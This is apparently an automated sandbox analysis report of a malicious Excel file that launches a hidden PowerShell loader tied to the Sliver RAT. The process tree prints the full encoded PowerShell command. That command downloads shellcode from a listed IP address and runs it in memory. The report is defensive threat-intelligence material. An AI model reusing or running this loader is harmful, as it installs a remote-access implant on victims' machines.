Analysis
-
max time kernel
59s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10/11/2024, 21:15
Behavioral task
behavioral1
Sample
e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a.xls
Resource
win7-20241010-en
General
-
Target
e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a.xls
-
Size
46KB
-
MD5
058a72e7a27017cac0d87d2181737e5c
-
SHA1
ac057c406c374ff8eae0184852ef739ed54728e5
-
SHA256
e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a
-
SHA512
056e3ed6698e2d7549d7203ab82c4e6f1675010de812446de611010d24d8d4b3e78f3ec522c96917bd36c77eeacb495ccfd8a4a1c154db5e1e163efb75b5c1ca
-
SSDEEP
768:o4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:jSFsv66g3KnF439NKC54kkGfn+cL2Xd+
Malware Config
Extracted
https://194.182.164.149:8080/fontawesome.woff
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 692 4044 powershell.exe 82 -
Sliver RAT v2 5 IoCs
resource yara_rule behavioral2/memory/692-61-0x000001CFFF2E0000-0x000001CFFFD5E000-memory.dmp SliverRAT_v2 behavioral2/memory/692-62-0x000001CF80A80000-0x000001CF81566000-memory.dmp SliverRAT_v2 behavioral2/memory/692-65-0x000001CF80A80000-0x000001CF81566000-memory.dmp SliverRAT_v2 behavioral2/memory/692-64-0x000001CF80A80000-0x000001CF81566000-memory.dmp SliverRAT_v2 behavioral2/memory/692-63-0x000001CF80A80000-0x000001CF81566000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 28 IoCs
flow pid Process 23 692 powershell.exe 25 692 powershell.exe 28 692 powershell.exe 29 692 powershell.exe 30 692 powershell.exe 31 692 powershell.exe 35 692 powershell.exe 43 692 powershell.exe 44 692 powershell.exe 45 692 powershell.exe 46 692 powershell.exe 47 692 powershell.exe 48 692 powershell.exe 49 692 powershell.exe 50 692 powershell.exe 51 692 powershell.exe 58 692 powershell.exe 66 692 powershell.exe 67 692 powershell.exe 68 692 powershell.exe 69 692 powershell.exe 70 692 powershell.exe 71 692 powershell.exe 72 692 powershell.exe 73 692 powershell.exe 74 692 powershell.exe 75 692 powershell.exe 76 692 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 692 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4044 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 692 powershell.exe 692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 692 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE 4044 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 4044 wrote to memory of 692 4044 EXCEL.EXE 86 PID 4044 wrote to memory of 692 4044 EXCEL.EXE 86 PID 692 wrote to memory of 4828 692 powershell.exe 89 PID 692 wrote to memory of 4828 692 powershell.exe 89 PID 4828 wrote to memory of 4308 4828 csc.exe 91 PID 4828 wrote to memory of 4308 4828 csc.exe 91
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e958c7960d354a86b54b72064200d3dce489f588147d86ed7c7e9a6252c6ea0a.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wnziqovm\wnziqovm.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES885A.tmp" "c:\Users\Admin\AppData\Local\Temp\wnziqovm\CSC1AE964DF1C9142CC886ABBDC7EA76368.TMP"4⤵PID:4308
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD518a8691de0dc4a100e6a24a4e8dfc2f0
SHA1ea644bea1f22edb82fb4532bc9f8e277e958039e
SHA2564a9d052a4fcad68bd94a35ebd4da5997198d0a971dca9a04e1224ef561f3a826
SHA512cefe9856c6d8779c2e67564fa815966e6bef9e18bc74be4c0b9c4c6b2d8846b7afc179095c2fd254c7a7624da29fb7ef25e279e27d9a832fb818eb9e90f77743
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD55198ace58dce94002b44863dcb890e51
SHA172d37a499d942b21f9f20dde7ef87896681b934f
SHA25686f24dc67e9a6949436aebac6b9c142a7e7e6e288a81dfb8c94aa2aee53d0050
SHA5123c6f0c8492e4fb3a897453082abe5b9444b838beed32a7d553f2387bdaf3cf741e85d84cb414a2573e4c1dbdba5ff2847f48be6e3f490a68aa33097a772099a8
-
Filesize
652B
MD51f328e2f84f26c90f08b219afbe7280c
SHA1db8d17305781625c51c8c303ceef03be54043c4d
SHA2566a9208f446dd9a16a84bbd7910d3f7e04649494d96079161bfe22c3e6b147aca
SHA512599be4ef9b537c40f1b771ecfe672a938cd348c57eba8b5372ceff9cb61de2286d0b968232d49dc609480ee8d3f933299cbb08865464e659a7ff7e68d5a73b75
-
Filesize
631B
MD5f4dd5c682eb7b3b679f084261bfc7c4c
SHA170f75d7a4e42c185eb09139ed3c6f7338a2219c2
SHA2562908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319
SHA5128f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d
-
Filesize
369B
MD5f8aeac905873f117ca151cf966db809e
SHA1d7d67602b6e6eff7c6e8b9eb35a48f4ec2e6339b
SHA256603c5d4a2fe904154d186a9c3e9e7e82611f814d6a609e65a343582bb1d5794c
SHA512c992f5e8aa167ed7c8a7da46b53f8c14657cbf5f15cb338dcdc208abf32d1f7f7c6856ff7b396bcc4b65b2c32261eb2d47753c4c55736848939038c1acbabaab